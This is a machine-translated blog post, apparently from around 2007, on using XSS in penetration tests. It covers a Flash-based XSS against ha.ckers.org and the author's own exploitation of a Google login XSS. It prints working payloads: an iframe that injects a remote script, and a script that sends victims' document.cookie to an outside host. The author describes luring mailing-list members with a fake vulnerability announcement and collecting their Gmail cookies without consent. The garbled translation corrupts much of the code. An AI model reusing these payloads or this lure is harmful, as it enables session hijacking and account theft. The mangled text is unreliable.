Xss/csrf in penetration test

Team: http://www.ph4nt0m.org
Blog: http://superhei.blogbus.com

I. Owning Ha.ckers.org

Some time ago, in Sirdarckcat and Kuza55 "Owning Ha.ckers.org", xss and other attacks were used for penetration. [the attack was unsuccessful, but the technical details are worth learning], for detailed technical details, refer:
1. Sirdarckcat's blog:
Http://sirdarckcat.blogspot.com/2007/11/inside-history-of-hacking-rsnake-for.html
2. rSnake's blog:

Http://ha.ckers.org/blog/20071104/owning-hackersorg-or-not/

First they took advantage of a previously rsnake flash used to test the xss: http://ha.ckers.org/xss.swf [has been denied access], because the flash itself has an xss [Cross Site flash: please refer to Stefano Di Paola's document Testing Flash Applications], as2 code like this:

GetURL ("javascript: alert (xss)", "_ self", "GET"); stop ();

In the "Flash Lite 2.x ActionScript Language Reference", you can describe http://livedocs.adobe.com/flashlite/2_cn/main/00000160.html:
<<
GetURL (url: String [, window: String [, method: String]): Void
.....
Method: String [Optional] -- The GET or POST method used to send variables. If no variable exists, this parameter is omitted. The GET method appends a variable to the end of the URL, which is used to send a small number of variables. The POST method sends a variable in a separate HTTP header, which is used to send a large number of variables.
<<
When we specify the 3rd parameter method: String as get or post, we can submit the variable append to the end of the url, which means that the url of the getURL function can be injection something :). We will return to xss.swf
We submit: xss.swf? A = 0: 0; eval (alert (xss );

In as2: getURL ("javascript: alert (xss )? A = 0: 0; eval (alert (xss); "," _ self "," GET ");
Note that? And are added to the back of the url, Sirdarckcat uses a js 3-element Condition a = 0: 0; cleverly closed and the statement.

Demo:

Http: // 60.190.243.111/superhei/xss/xss.swf? A = 0: 0; eval (alert (xss2 ));

Xss is successfully completed.

The following is used in the poc of Sirdarckcat:

<Iframe src = "http://ha.ckers.org/xss.swf? A = 0: 0; a/**/setter = eval; B/**/setter = atob; a = B = name; "name = "... [playload] "> </iframe>

Here they think rSnake uses ff + noscript, so the above pass noscript is used. Of course, noscript has fixed this bug.

A = 0: 0; a/**/setter = eval; B/**/setter = atob; a = B = name;
This is
Eval (atob (window. name )).

Atob = decode base64

This is another technique. I used encoding to get rid of some tests ..

His playload seems to be using a csrf to send a blog? I did not go to the wp code here :).

In irc, I asked Sirdarckcat why he didn't need it. He got the cookie and then spoofed it into the background. He said that he might have disabled his ip address login.

Throughout the process, Sirdarckcat and Kuza55 used n details to achieve their goal, because their goal was also an xss cool-man. For example, they used css to retrieve the browser access history first, to determine whether the target has been in the background [The purpose of using css is no script] and so on ....

Ii. Owning Some-Hackss Gmail

Also some time ago jx found a google login port xss: http://www.xfocus.net/articles/200711/957.html, before the release of xf, I use this bug to test, as a result, I got the gmail cookies of many secure people in China :)

Xss point:

& 1-= 1 "> https://www.google.com/accounts/ServiceLogin? Service = mail & rm = false & continue = http % 3A % 2F % 2Fmail.google.com % 2 Fmail % 2F % 3Fui % 3 Dhtml % 26zy % 3Dl & ltmpl = default & ltmplcache = 2 & passive = truel # "> </script> <script> alert (xss) </script> & 1-= 1

Usage: we often find that this is an https xss. We cannot get the gmail cookie when using iframe in ie [of course we use the window mentioned in jx. location is not concealed.] Our goal is to achieve security. General Security awareness is still there. At present, ff is generally used for security, because ie is too insecure, so I decided to only consider ff ....

The code for creating iframe is as follows [thanks to luoluo's instructions :)]:

<Html> <body> <iframe src = "" id = "f"> </iframe> <script> foourl =; document. getElementById ("f "). src = https://www.google.com/accounts/ServiceLogin? Service = mail & rm = false & continue = http % 3A % 2F % 2Fmail.google.com % 2 Fmail % 2F % 3Fui % 3 Dhtml % 26zy % 3Dl & ltmpl = default & ltmplcache = 2 & passive = truel # "> </SC + rept> <scr + ipt src =""> Http: // 60.190.243.111/superhei/ieav/gm. js "> </scr + ERT>; alert (document. getElementById ("f "). src); document. getElementById ("f "). style. width = 0; document. getElementById ("f "). style. height = 0; </script> </body>

Put my playload in a remote js: http: // 60.190.243.111/superhei/ieav/gm. js

So how can we get the target access? haha, here the phantom maillist has helped me a lot. maillist is an ideal place for my testing.

First, I published a phpcms vulnerability announcement in maillist, which contains a link: http: // 60.190.243.111/superhei/ieav/phpcms.htm. Here, there is a simple analysis of the phpcms vulnerability found in phpcms.htm [because it is just a test, I didn't send anything tempting, such as ie0day or something, the analysis is also very simple], of course, there is also the xss code constructed above.

Let's take a look at the real playload: http: // 60.190.243.111/superhei/ieav/gm. js code:

GetURL ("http://xxx.com/test.asp? Cn = "+ encodeURIComponent (document. cookie); function getURL (s) {var image = new Image (); image. style. width = 0; image. style. height = 0; image. src = s ;}

Use Image to send cookies.

Then, after publishing my post in maillist, I went to the evening shift. When I got off work at on the first day, I found that there were n cookies in my database :)

Throughout the process, I thought my behavior would be discovered. Unfortunately, no one has followed the post and responded. Only one friend, our boy, intercepted my attack with noscript, I knew nothing about noscript before I started, so I did not consider it at all. As a result, the security awareness of domestic security personnel should be strengthened. in fact, this attack has no new things or technical details like Sirdarckcat, but the effect is still obvious. When lis0 used xss to enter my 163 mail, maybe they used the same trick?

Iii. Subsequent remarks

Xss and csrf are the most shameless attack methods I have ever seen, especially csrf [although not covered in the above example]. This is why I have always bs them, while bs and they are, we should learn about them because hackers are everywhere :)

Many people in China only come to alert when talking about xss. It is still very troublesome to take advantage of it, and the actual use of penetration testing is even less ..., however, I have reason to believe that more xss, csrf, and other attack methods will appear in the future penetration tests.

[Finally, thank you for sharing with me and Learning Together!]